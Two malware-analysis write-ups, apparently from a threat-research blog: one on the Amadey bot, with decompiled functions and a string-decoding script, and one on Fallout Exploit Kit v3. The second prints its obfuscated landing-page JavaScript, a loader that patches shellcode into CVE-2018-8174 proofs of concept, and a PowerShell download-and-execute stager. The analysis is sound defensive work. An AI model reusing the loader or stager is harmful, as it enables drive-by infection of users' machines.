Analyzing Amadey

Initial Access

Amedey is installed by msiexec.exe when you open a malicious excel file. From the document file technique, the threat actor is considered TA505.

The download URL is as follows:

msiexec.exe STOP=1 /i /q ksw='%TEMP%'

First payload

First payload is packed. Extract the original PE using the hollows_hunter mode of tknk_scanner.


The dumped PE is compiled with MinGW.

PE: compiler: MinGW(-)[-]
PE: linker: GNU linker ld (GNU Binutils)(2.56*)[EXE32]

It contains symbol information. Amedey has the following functions:


The main function is as follows.

int __cdecl main(int _Argc,char **_Argv,char **_Env)

  char *pcVar1;
                    /* 0x3ac8  97  main */
  pcVar1 = _Z12aGetSelfPathv();
  pcVar1 = _Z19aGetSelfDestinationi(0);
  return 0;

The _Z6aBasici function is as follows.

/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */

void __cdecl _Z6aBasici(int param_1)

  char *_Source;
  uint uVar1;
  int iVar2;
                    /* 0x33fe  32  _Z6aBasici */
  _Source = _Z8aDecryptPc(&aDomain);
  _Source = _Z8aDecryptPc(&aScript);
  _Source = _Z8aDecryptPc(&aParam0);
  _Source = _Z6aGetIdv();
  _Source = _Z8aDecryptPc(&aParam1);
  _Source = _Z8aDecryptPc(&aVers);
  uVar1 = _Z11aCheckAdminv();
  if ((uVar1 & 0xff) == 1) {
    _Source = _Z8aDecryptPc(&aParam2);
  else {
    _Source = _Z8aDecryptPc(&aParam2);
  _Source = _Z8aDecryptPc(&aParam3);
  _Source = _Z10aGetOsArchv();
  _Source = _Z8aDecryptPc(&aParam4);
  _Source = _Z10aIntToChari(param_1);
  _Source = _Z8aDecryptPc(&aParam5);
  iVar2 = _Z6aGetOsv();
  _Source = _Z10aIntToChari(iVar2);
  _Source = _Z8aDecryptPc(&aParam6);
  uVar1 = _Z8aCheckAVv();
  _Source = _Z10aIntToChari(uVar1);
  _Source = _Z8aDecryptPc(&aParam7);
  _Source = _Z12aGetHostNamev();
  _Source = _Z8aDecryptPc(&aParam8);
  _Source = _Z12aGetUserNamev();
  if (param_1 == 0) {
    do {
      _Source = _Z12aWinSockPostPcS_S_(&stack0xffffddf4,&stack0xffffdbf4,&stack0xffffeff4);
    } while( true );
  if (param_1 == 1) {

Some important parameters are encoded. However, the encoding algorithm is very simple.

key is 8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7

Finally, we analyze the decoded string and the name of the function in which it was used.

Here is the simple python script.

domain=[0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D]
AutoRunCmdr=[0x8A, 0xAA, 0xA9, 0x84, 0x74, 0x7D, 0x7D, 0x54, 0x58, 0x81, 0x7E, 0xA5, 0x85, 0xC0, 0x87, 0xA8, 0x9D, 0xAA, 0xA7, 0x93, 0xA3, 0x9C, 0x91, 0x85, 0xCC, 0x95, 0xD6, 0xA6, 0xD5, 0xD5, 0xCC, 0xAB, 0x95, 0x8A, 0xCB, 0x9E, 0xC8, 0xA3, 0xB0, 0xAA, 0x92, 0x73, 0xA7, 0xA3, 0xA9, 0x9A, 0xA6, 0xD7, 0x88, 0xC9, 0xA9, 0xD5, 0xCF, 0xD5, 0xA5, 0x94, 0xAA, 0xDA, 0xD4, 0x9F, 0xA8, 0xAB, 0x99, 0xA8, 0x95, 0x88, 0xD5, 0x95, 0xD6, 0x54, 0x8C, 0x9F, 0x9B, 0x9C, 0x9E, 0x51, 0x7D, 0xA4, 0xA4, 0xC7, 0x97, 0xD6, 0xAA, 0x84, 0x86, 0x95, 0x9D, 0x59, 0x62, 0xD8, 0x50, 0xB7, 0xA8, 0x9A, 0xA9, 0xAA, 0xA5, 0xA2, 0x51, 0x66, 0xA9, 0x58, 0xB5, 0x77, 0xAB, 0x96, 0xB5, 0xC0, 0x86, 0x66, 0x9C, 0x85]
AV00=[0x79, 0xBB, 0xA3, 0xB7, 0x87, 0x59, 0x8C, 0xA3, 0x9C, 0xAD, 0xAA, 0xC3, 0xA2, 0xC9]#AV00
AV01=[0x79, 0xDB, 0xCB, 0xD6, 0x94]
AV02=[0x83, 0xC6, 0xD5, 0xD4, 0x98, 0xAB, 0xAC, 0x9F, 0xAF, 0x59, 0x7F, 0xC3, 0x92]
AV03=[0x7D, 0xB8, 0xA7, 0xB8]
AV04=[0x88, 0xC6, 0xD0, 0xC8, 0x94, 0x59, 0x8C, 0x99, 0x99, 0xAE, 0xA5, 0xCB, 0xA4, 0xDD]
AV05=[0x7C, 0xD4, 0xC5, 0xD8, 0xA2, 0xAB, 0x59, 0x8B, 0x9B, 0x9B]
AV06=[0x79, 0xBB, 0xA9]
AV07=[0x6B, 0x9B, 0x92, 0xB8, 0xA2, 0xAD, 0x9A, 0xA0, 0x89, 0x9E, 0x96, 0xD7, 0xA2, 0xCD, 0xA8, 0xB2]
AV08=[0x7A, 0xCE, 0xD6, 0xC8, 0x98, 0x9F, 0x9E, 0xA2, 0x9A, 0x9E, 0xA5]
AV09=[0x86, 0xD4, 0xD4, 0xD8, 0xA2, 0xA7]
AV10=[0x8B, 0xD4, 0xD2, 0xCC, 0xA2, 0xAC]
AV11=[0x7B, 0xD4, 0xCF, 0xD3, 0x97, 0xA8]
CMD0=[0x74, 0xC8, 0xA0]
CMD1=[0x74, 0xC9, 0xA0]
DLL=[0x9C, 0xD1, 0xCE]
DropDir=[0x9E, 0x9B, 0x96, 0xC5, 0x67, 0x6B, 0x71, 0x98, 0x9C, 0x9D]
DropName=[0x9B, 0xD2, 0xD7, 0xC5, 0x9F, 0xAB, 0x9C, 0x62, 0x9B, 0xB1, 0x98]
exe=[0x9D, 0xDD, 0xC7]
GetProgDir=[0x88, 0xD7, 0xD1, 0xCB, 0xA5, 0x9A, 0xA6, 0x78, 0x97, 0xAD, 0x94, 0xBE]
OS_AR0=[0xA3, 0xCA, 0xD4, 0xD2, 0x98, 0xA5, 0x6C, 0x66, 0x64, 0x9D, 0x9F, 0xCE]
OS_AR1=[0x7F, 0xCA, 0xD6, 0xB2, 0x94, 0xAD, 0xA2, 0xAA, 0x9B, 0x8C, 0xAC, 0xD5, 0xA4, 0xC9, 0xA1, 0x82, 0xA5, 0x9C, 0x9F]
Param0=[0xA1, 0xC9, 0x9F]
Param1=[0x5E, 0xDB, 0xD5, 0xA1]
Param2=[0x5E, 0xC6, 0xD4, 0xA1]
Param3=[0x5E, 0xC7, 0xCB, 0xA1]
Param4=[0x5E, 0xD1, 0xD8, 0xA1]
Param5=[0x5E, 0xD4, 0xD5, 0xA1]
Param6=[0x5E, 0xC6, 0xD8, 0xA1]
Param7=[0x5E, 0xD5, 0xC5, 0xA1]
Param8=[0x5E, 0xDA, 0xD0, 0xA1]
Post0=[0x45, 0x6F]
Post1=[0x58, 0xAD, 0xB6, 0xB8, 0x83, 0x68, 0x6A, 0x62, 0x67]
Post2=[0x79, 0xC8, 0xC5, 0xC9, 0xA3, 0xAD, 0x73, 0x54, 0x60, 0x68, 0x5D]
Post3=[0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x8A, 0xB2, 0xA3, 0xC7, 0x6A, 0x84, 0x95, 0xA9, 0xA7, 0xA2, 0x99, 0x95, 0x92, 0xAB, 0x9E, 0xA7, 0xD1, 0x61, 0xDC, 0x64, 0xD9, 0xDD, 0xDD, 0x64, 0x9F, 0xA2, 0xD4, 0x9D, 0x91, 0xA9, 0xAB, 0xA3, 0x9B, 0x9E, 0x95, 0xA0, 0x9B, 0x9A, 0x9C]
Post4=[0x80, 0xD4, 0xD5, 0xD8, 0x6D, 0x59]
Post5=[0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x82, 0x9E, 0xA1, 0xC9, 0xA4, 0xCC, 0x6E, 0x59]
Post6=[0x88, 0xB4, 0xB5, 0xB8, 0x53, 0x68]
RunAs=[0xAA, 0xDA, 0xD0, 0xC5, 0xA6]
RunDll_0=[0xAA, 0xDA, 0xD0, 0xC8, 0x9F, 0xA5, 0x6C, 0x66, 0x64, 0x9E, 0xAB, 0xC7, 0x50]
Script=[0xA8, 0xD5, 0xCD, 0x93, 0x9C, 0xA7, 0x9D, 0x99, 0xAE, 0x67, 0xA3, 0xCA, 0xA0]
Shell=[0x8B, 0xAD, 0xA7, 0xB0, 0x7F, 0x6C, 0x6B, 0x62, 0x7A, 0x85, 0x7F]
TimeOut=[0x60, 0xEA, 0x00, 0x00, 0x44]
URLMon_0=[0xAD, 0xD7, 0xCE, 0xD1, 0xA2, 0xA7]
URLMon_1=[0x8D, 0xB7, 0xAE, 0xA8, 0xA2, 0xB0, 0xA7, 0xA0, 0xA5, 0x9A, 0x97, 0xB6, 0x9F, 0xAA, 0x9D, 0xA5, 0x9C, 0x77]
Vers=[0x69, 0x93, 0x94, 0x96]
ZoneIdent =[0x72, 0xBF, 0xD1, 0xD2, 0x98, 0x67, 0x82, 0x98, 0x9B, 0xA7, 0xA7, 0xCB, 0x96, 0xCD, 0x99, 0xAB]

encoded_str=[0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D]


    length = len(encoded_str)
    if length <= c:
    length = len(Key);
    print(chr(encoded_str[c] - ord(Key[c % length])), end='')
    #print(encoded_str[c] - ord(Key[c % length]), end='')
    c += 1


Analysis of Fallout Exploit Kit v3


We already tweeted, but the Fallout Exploit Kit has been updated. In the new Fallout, the traffic chain, obfuscation method of landing page and shellcode are changing. We will introduce details on the changes using’s saz file.

New #FalloutEK is using PoC on GitHub!
(CC: @kafeine, @jeromesegura, @malware_traffic)

— nao_sec (@nao_sec) 2019年2月28日


As usual HookAds Campaign will reach the landing page of Fallout and the attack will start. The flow of traffic is like this.

Landing Page

Let’s read the JavaScript on the landing page. Firstly, the objects necessary for decoding are defined.

var OygitP9 = {
    fZ2S0q: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
    cMa5g: function (MQVCd) {
        var b8j5WMF, negriNm4A3, ir4N7w, W3cN0hF2WFu, qT8fpZ1, m3Z1Kc, T82SkC, OcKyWsdOFyq = "",
            p2Z2Fkoy = 0;
        for (MQVCd = OygitP9.P1mnrrMi834(MQVCd); p2Z2Fkoy < MQVCd['length'];) W3cN0hF2WFu = (b8j5WMF = MQVCd['charCodeAt'](p2Z2Fkoy++)) >> 2, qT8fpZ1 = (3 & b8j5WMF) << 4 | (negriNm4A3 = MQVCd['charCodeAt'](p2Z2Fkoy++)) >> 4, m3Z1Kc = (15 & negriNm4A3) << 2 | (ir4N7w = MQVCd['charCodeAt'](p2Z2Fkoy++)) >> 6, T82SkC = 63 & ir4N7w, isNaN(negriNm4A3) ? m3Z1Kc = T82SkC = 64 : isNaN(ir4N7w) && (T82SkC = 64), OcKyWsdOFyq = OcKyWsdOFyq + this['fZ2S0q']['charAt'](W3cN0hF2WFu) + this['fZ2S0q']['charAt'](qT8fpZ1) + this['fZ2S0q']['charAt'](m3Z1Kc) + this['fZ2S0q']['charAt'](T82SkC);
        return OcKyWsdOFyq
    jbRyz: function (MQVCd) {
        var b8j5WMF, negriNm4A3, ir4N7w, W3cN0hF2WFu, qT8fpZ1, m3Z1Kc, T82SkC = "",
            OcKyWsdOFyq = 0;
        for (MQVCd = MQVCd['replace'](/[^A-Za-z0-9\+\/\=]/g, ""); OcKyWsdOFyq < MQVCd['length'];) b8j5WMF = this['fZ2S0q']['indexOf'](MQVCd['charAt'](OcKyWsdOFyq++)) << 2 | (W3cN0hF2WFu = this['fZ2S0q']['indexOf'](MQVCd['charAt'](OcKyWsdOFyq++))) >> 4, negriNm4A3 = (15 & W3cN0hF2WFu) << 4 | (qT8fpZ1 = this['fZ2S0q']['indexOf'](MQVCd['charAt'](OcKyWsdOFyq++))) >> 2, ir4N7w = (3 & qT8fpZ1) << 6 | (m3Z1Kc = this['fZ2S0q']['indexOf'](MQVCd['charAt'](OcKyWsdOFyq++))), T82SkC += window['String']['fromCharCode'](b8j5WMF), 64 != qT8fpZ1 && (T82SkC += window['String']['fromCharCode'](negriNm4A3)), 64 != m3Z1Kc && (T82SkC += window['String']['fromCharCode'](ir4N7w));
        return T82SkC = OygitP9.quSjT4yyl(T82SkC)
    P1mnrrMi834: function (MQVCd) {
        MQVCd = MQVCd['replace'](/\r\n/g, "\n");
        for (var b8j5WMF = "", negriNm4A3 = 0; negriNm4A3 < MQVCd['length']; negriNm4A3++) {
            var ir4N7w = MQVCd['charCodeAt'](negriNm4A3);
            ir4N7w < 128 ? b8j5WMF += window['String']['fromCharCode'](ir4N7w) : (127 < ir4N7w && ir4N7w < 2048 ? b8j5WMF += window['String']['fromCharCode'](ir4N7w >> 6 | 192) : (b8j5WMF += window['String']['fromCharCode'](ir4N7w >> 12 | 224), b8j5WMF += window['String']['fromCharCode'](ir4N7w >> 6 & 63 | 128)), b8j5WMF += window['String']['fromCharCode'](63 & ir4N7w | 128))
        return b8j5WMF
    quSjT4yyl: function (MQVCd) {
        for (var b8j5WMF = "", negriNm4A3 = 0, ir4N7w = UK1Az5 = zxh4w4 = 0; negriNm4A3 < MQVCd['length'];)(ir4N7w = MQVCd['charCodeAt'](negriNm4A3)) < 128 ? (b8j5WMF += window['String']['fromCharCode'](ir4N7w), negriNm4A3++) : 191 < ir4N7w && ir4N7w < 224 ? (zxh4w4 = MQVCd['charCodeAt'](negriNm4A3 + 1), b8j5WMF += window['String']['fromCharCode']((31 & ir4N7w) << 6 | 63 & zxh4w4), negriNm4A3 += 2) : (zxh4w4 = MQVCd['charCodeAt'](negriNm4A3 + 1), c3 = MQVCd['charCodeAt'](negriNm4A3 + 2), b8j5WMF += window['String']['fromCharCode']((15 & ir4N7w) << 12 | (63 & zxh4w4) << 6 | 63 & c3), negriNm4A3 += 3);
        return b8j5WMF

The next defined object is also for decoding.

window['String']['prototype']['kWNcdNj7d6U'] = function (DwQ5oeN9ct) {
    var hxk4VZ3L8GC = window[DwQ5oeN9ct];
    var UsEJ64xf0P = '';
    for (var D8H6A7MGHf = 0, r5UpGh = 0; D8H6A7MGHf < this['length']; D8H6A7MGHf++, r5UpGh++) {
        if (r5UpGh === hxk4VZ3L8GC['length']) {
            r5UpGh = 0;
        UsEJ64xf0P += window['String']['fromCharCode'](this['charCodeAt'](D8H6A7MGHf) ^ hxk4VZ3L8GC['charCodeAt'](r5UpGh));
    return UsEJ64xf0P;

The next object, make sure that it is not in Chrome and Opera using, for example, User-Agent.

window['String']['prototype']['i2668FMs5B8'] = function () {
    var BITU978SF7 = ((!!window['opr'] && !!window['opr']['addons']) || !!window['opera'] || navigator['userAgent']['indexOf'](' OPR/') >= 0) + this + (typeof window['InstallTrigger'] !== 'undefined') + this + (false || !!window['document']['documentMode']) + this + (!!window['chrome'] && !!window['chrome']['runtime']);
    return window['OygitP9']['cMa5g'](BITU978SF7['kWNcdNj7d6U']('RLGuTgUF3d0'));

The next object is for executing code. This is the most important object.

window['String']['prototype']['eCWmvY'] = function () {

With these codes, the following code will be executed. This downloads the encoded data and executes it.

window['VS4H8Yo1']['onreadystatechange'] = function () {
    if (4 == this['readyState'] && 200 == this['status']) {
        var W7iaUaId = window['VS4H8Yo1']['responseText'];
        var riqAvm0Is = window['OygitP9']['jbRyz'](W7iaUaId)['kWNcdNj7d6U']('RLGuTgUF3d0');

window['VS4H8Yo1']['open']('post', window['OygitP9']['jbRyz'](mbwk99)['kWNcdNj7d6U']('RLGuTgUF3d0'), true);
window['VS4H8Yo1']['send']('@@' ['i2668FMs5B8']());

Encoded data

When decoding the code, it looks like the following.

var ZV7S8RUn = '-- Shellcode here --';
var dIl15w = new window['XDomainRequest']();
dIl15w['onload'] = function() {
    var H2Kqgnp = dIl15w['responseText'];
    var WW7QZmX = H2Kqgnp['substring'](H2Kqgnp['indexOf']('<script language="vbscript">'),H2Kqgnp['indexOf']('</body>'));
    var l1a2N5kr = WW7QZmX['split']('\n');
    for(var L8c4YdRG = 0; L8c4YdRG < l1a2N5kr['length']; L8c4YdRG++) {
        if(l1a2N5kr[L8c4YdRG]['indexOf']('%ue8fc%u008') != -1 || l1a2N5kr[L8c4YdRG]['indexOf']('#{encoded_payload}') != -1 || l1a2N5kr[L8c4YdRG]['indexOf']('%u8b55%u81ec') != -1 || l1a2N5kr[L8c4YdRG]['indexOf']('REPLACE_SHELLCODE_HERE') != -1) {
            var g68j2okJh5D = '';
            if(l1a2N5kr[L8c4YdRG]['indexOf']('%ue8fc%u008') != -1) {
                g68j2okJh5D = '%ue8fc%u008';
            if(l1a2N5kr[L8c4YdRG]['indexOf']('#{encoded_payload}') != -1) {
                g68j2okJh5D = '#{encoded_payload}';
            if(l1a2N5kr[L8c4YdRG]['indexOf']('%u8b55%u81ec') != -1) {
                g68j2okJh5D = '%u8b55%u81ec';
            if(l1a2N5kr[L8c4YdRG]['indexOf']('REPLACE_SHELLCODE_HERE') != -1) {
                g68j2okJh5D = 'REPLACE_SHELLCODE_HERE';
            var zEZGDPaGVEt = l1a2N5kr[L8c4YdRG]['substring'](l1a2N5kr[L8c4YdRG]['indexOf'](g68j2okJh5D),l1a2N5kr[L8c4YdRG]['indexOf']('"',l1a2N5kr[L8c4YdRG]['indexOf'](g68j2okJh5D)));
            l1a2N5kr[L8c4YdRG] = l1a2N5kr[L8c4YdRG]['replace'](zEZGDPaGVEt,ZV7S8RUn);
        if(l1a2N5kr[L8c4YdRG]['indexOf']('\'') != -1) {
            var TJIp1rglYoq = l1a2N5kr[L8c4YdRG]['substring'](l1a2N5kr[L8c4YdRG]['indexOf']('\''));
            l1a2N5kr[L8c4YdRG] = l1a2N5kr[L8c4YdRG]['replace'](TJIp1rglYoq,'');
        if(l1a2N5kr[L8c4YdRG]['indexOf']('MsgBox') != -1) {
            l1a2N5kr[L8c4YdRG] = '';
        if(l1a2N5kr[L8c4YdRG]['indexOf']('Alert') != -1) {
            l1a2N5kr[L8c4YdRG] = '';
    WW7QZmX = l1a2N5kr['join']('\n');
    var nbvMHPdb = window['document']['createElement']("iframe");
    nbvMHPdb['setAttribute']("id", "AARa7");
    var ocH5HC2B = window['document']['getElementById']("AARa7")['contentWindow']['document'];
dIl15w['open']('get', '');

This code is exploit by replacing the shellcode part of PoC of CVE-2018-8174 on GitHub. We are finding that four PoCs are being exploited. There may be other things.


In the previous blog We wrote that Fallout uses RC4 and powershell. Currently, It decrypts with RC4 using multiple keys.

Encrypted data

Encrypted data is near the end of the shell code.

The following strings are encrypted.


API hash

The API called by the shell code has been hashed by the dualaccModFFF1Hash algorithm.

ShellcodeHashSearcher: 0x00000686: dualaccModFFF1Hash:0x191c0443 kernel32.dll!CloseHandle
ShellcodeHashSearcher: 0x00000694: dualaccModFFF1Hash:0x28b90575 kernel32.dll!CreateProcessA
ShellcodeHashSearcher: 0x000006a6: dualaccModFFF1Hash:0x73320951 kernel32.dll!CreateToolhelp32Snapshot
ShellcodeHashSearcher: 0x000006b9: dualaccModFFF1Hash:0x33f50614 kernel32.dll!GetModuleHandleA
ShellcodeHashSearcher: 0x000006ca: dualaccModFFF1Hash:0x1d810497 kernel32.dll!LoadLibraryA
ShellcodeHashSearcher: 0x000006da: dualaccModFFF1Hash:0x2785054d kernel32.dll!Process32First
ShellcodeHashSearcher: 0x000006eb: dualaccModFFF1Hash:0x225904e4 kernel32.dll!Process32Next
ShellcodeHashSearcher: 0x000006fc: dualaccModFFF1Hash:0x1f7004d3 kernel32.dll!VirtualAlloc
ShellcodeHashSearcher: 0x0000070d: dualaccModFFF1Hash:0x1a1e047a kernel32.dll!ExitProcess
ShellcodeHashSearcher: 0x0000071e: dualaccModFFF1Hash:0x158503f3 kernel32.dll!ExitThread
ShellcodeHashSearcher: 0x00000737: dualaccModFFF1Hash:0x08d8028c msvcrt.dll!memset
ShellcodeHashSearcher: 0x00000737: dualaccModFFF1Hash:0x08d8028c ntoskrnl.exe!memset
ShellcodeHashSearcher: 0x00000737: dualaccModFFF1Hash:0x08d8028c ntdll.dll!memset
ShellcodeHashSearcher: 0x00000778: dualaccModFFF1Hash:0x3610065d wininet.dll!HttpOpenRequestA
ShellcodeHashSearcher: 0x00000787: dualaccModFFF1Hash:0x29fb0584 wininet.dll!HttpQueryInfoA
ShellcodeHashSearcher: 0x0000079a: dualaccModFFF1Hash:0x35c70655 wininet.dll!HttpSendRequestA
ShellcodeHashSearcher: 0x000007ab: dualaccModFFF1Hash:0x4b92078c wininet.dll!InternetCloseHandle
ShellcodeHashSearcher: 0x000007bc: dualaccModFFF1Hash:0x36640655 wininet.dll!InternetConnectA
ShellcodeHashSearcher: 0x000007cd: dualaccModFFF1Hash:0x245c051d wininet.dll!InternetOpenA
ShellcodeHashSearcher: 0x000007de: dualaccModFFF1Hash:0x35c00646 wininet.dll!InternetReadFile
ShellcodeHashSearcher: 0x00000685: dualaccModFFF1Hash:0x191c0443 kernel32.dll!CloseHandle
ShellcodeHashSearcher: 0x00000693: dualaccModFFF1Hash:0x28b90575 kernel32.dll!CreateProcessA
ShellcodeHashSearcher: 0x000006a5: dualaccModFFF1Hash:0x73320951 kernel32.dll!CreateToolhelp32Snapshot
ShellcodeHashSearcher: 0x000006b8: dualaccModFFF1Hash:0x33f50614 kernel32.dll!GetModuleHandleA
ShellcodeHashSearcher: 0x000006c9: dualaccModFFF1Hash:0x1d810497 kernel32.dll!LoadLibraryA
ShellcodeHashSearcher: 0x000006d9: dualaccModFFF1Hash:0x2785054d kernel32.dll!Process32First
ShellcodeHashSearcher: 0x000006ea: dualaccModFFF1Hash:0x225904e4 kernel32.dll!Process32Next
ShellcodeHashSearcher: 0x000006fb: dualaccModFFF1Hash:0x1f7004d3 kernel32.dll!VirtualAlloc
ShellcodeHashSearcher: 0x0000070c: dualaccModFFF1Hash:0x1a1e047a kernel32.dll!ExitProcess
ShellcodeHashSearcher: 0x0000071d: dualaccModFFF1Hash:0x158503f3 kernel32.dll!ExitThread
ShellcodeHashSearcher: 0x00000736: dualaccModFFF1Hash:0x08d8028c msvcrt.dll!memset
ShellcodeHashSearcher: 0x00000736: dualaccModFFF1Hash:0x08d8028c ntoskrnl.exe!memset
ShellcodeHashSearcher: 0x00000736: dualaccModFFF1Hash:0x08d8028c ntdll.dll!memset
ShellcodeHashSearcher: 0x00000777: dualaccModFFF1Hash:0x3610065d wininet.dll!HttpOpenRequestA
ShellcodeHashSearcher: 0x00000786: dualaccModFFF1Hash:0x29fb0584 wininet.dll!HttpQueryInfoA
ShellcodeHashSearcher: 0x00000799: dualaccModFFF1Hash:0x35c70655 wininet.dll!HttpSendRequestA
ShellcodeHashSearcher: 0x000007aa: dualaccModFFF1Hash:0x4b92078c wininet.dll!InternetCloseHandle
ShellcodeHashSearcher: 0x000007bb: dualaccModFFF1Hash:0x36640655 wininet.dll!InternetConnectA
ShellcodeHashSearcher: 0x000007cc: dualaccModFFF1Hash:0x245c051d wininet.dll!InternetOpenA
ShellcodeHashSearcher: 0x000007dd: dualaccModFFF1Hash:0x35c00646 wininet.dll!InternetReadFile

The final encoded PowerShell script is downloaded, decoded and executed.


Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

public struct lI111
    public IntPtr llIll;
    public IntPtr II1ll1I1;
    public uint llllIlI;
    public uint l1l1l;

public struct lI1I1l1l
    public uint lI1lI1I;
    public string l1l1II1;
    public string llIlI1;
    public string IlIl1l;
    public uint ll1llI11;
    public uint ll1l11I1;
    public uint IlI11lI;
    public uint IIlIll1I;
    public uint IIl1II;
    public uint I11Il;
    public uint IIIIII;
    public uint l1IlIll;
    public short llI11l1;
    public short llll1I11;
    public IntPtr I1llIIlI;
    public IntPtr Il1I11lI;
    public IntPtr llllll;
    public IntPtr lI1l1I1I;

public static class I1l11lIl
    public static extern bool CreateProcess(string I1l1Il1I,string l1111,IntPtr lllI111,IntPtr I111IIlI,bool lllll,uint III1l1l1,IntPtr l1l1l11l,string lIll1111,ref lI1I1l1l l111l,out lI111 I1111l1);

$lIlI1 = "$env:userprofile\AppData\LocalLow\$(-join((48..57)+(65..90)+(97..122)|Get-Random -Count 8|%{[char]$_})).tmp";
$Il11l = '';

$cli = (New-Object Net.WebClient);
$cli.Headers['User-Agent'] = 'pqqyW56Fe8W2G7m3';
$cli.DownloadFile($Il11l, $lIlI1);

$llII11l = New-Object lI1I1l1l;
$llII11l.llI11l1 = 0x0;
$llII11l.lI1lI1I = [System.Runtime.InteropServices.Marshal]::SizeOf($llII11l);
$I1111111 = New-Object lI111;
[I1l11lIl]::CreateProcess($lIlI1, $lIlI1, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0x00000008, [IntPtr]::Zero, "c:", [ref]$llII11l, [ref]$I1111111)|out-null;

This PowerShell code downloads the malware and calls CreateProcess. At this time, User-Agent is not common.


Fallout has also evolved. Analysis has become more difficult than before. You should keep an eye on Fallout in the future.